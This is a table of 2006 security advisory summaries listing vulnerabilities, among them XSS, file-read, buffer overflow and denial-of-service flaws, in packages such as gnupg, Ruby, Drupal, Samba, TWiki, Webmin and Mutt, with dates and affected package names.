| 2006-08-02 | Author reports: Fixed 2 more possible memory allocation attacks. They are similar to the problem we fixed with 1.4.4. This bug can easily be exploited for a DoS; remote code execution is not entirely impossible. more... | gnupg |
| 2006-07-30* | Secunia reports: Two vulnerabilities have been reported in Ruby, which can be exploited by malicious people to bypass certain security restrictions. An error in the handling of the "alias" functionality can be exploited to bypass the safe level protection and replace methods called in the trusted level. An error caused due to directory operations not being properly checked can be exploited to bypass the safe level protection and close untainted directory streams. more... | ruby ruby_static |
| 2006-07-14 | Zope team reports: Unspecified vulnerability in (Zope2) allows local users to obtain sensitive information via unknown attack vectors related to the docutils module and "restructured text". more... | zope |
| 2006-07-14* | The Drupal team reports: Vulnerability: XSS vulnerability in taxonomy module. It is possible for a malicious user to insert and execute XSS into terms, due to lack of validation on output of the page title. The fix wraps the display of terms in check_plain(). more... | drupal |
| 2006-07-11 | Goober's advisory reports that shoutcast is vulnerable to an arbitrary file reading vulnerability: Impact of the vulnerability depends on the way the product was installed. In general, the vulnerability allows the attacker to read any file which can be read by the Shoutcast server process. more... | linux-shoutcast shoutcast |
| 2006-07-10 | The Samba Team reports: The smbd daemon maintains internal data structures used to track active connections to file and printer shares. In certain circumstances an attacker may be able to continually increase the memory usage of an smbd process by issuing a large number of share connection requests. This defect affects all Samba configurations. more... | ja-samba samba |
| 2006-07-10 | A TWiki Security Alert reports: The TWiki upload filter already prevents executable scripts such as .php, .php1, .phps, .pl from potentially getting executed by appending a .txt suffix to the uploaded filename. However, PHP and some other types allow additional file suffixes, such as .php.en, .php.1, and .php.2. TWiki does not check for these suffixes, e.g. it is possible to upload php scripts with such suffixes without the .txt filename padding. This issue can also be worked around with a restrictive web server configuration. See the TWiki Security Alert for more information about how to do this. more... | twiki |
| 2006-07-05 | Horde 3.1.2 release announcement: Security Fixes: Closed XSS problems in dereferrer (IE only), help viewer and problem reporting screen. Removed unused image proxy code from dereferrer. more... | horde horde-php5 |
| 2006-07-02 | The webmin development team reports: An attacker without a login to Webmin can read the contents of any file on the server using a specially crafted URL. All users should upgrade to version 1.290 as soon as possible, or set up IP access control in Webmin. more... | usermin webmin |
| 2006-06-30 | SecurityFocus reports: Mutt is prone to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. This issue may allow remote attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely crash the application, denying further service to legitimate users. more... | ja-mutt ja-mutt-devel |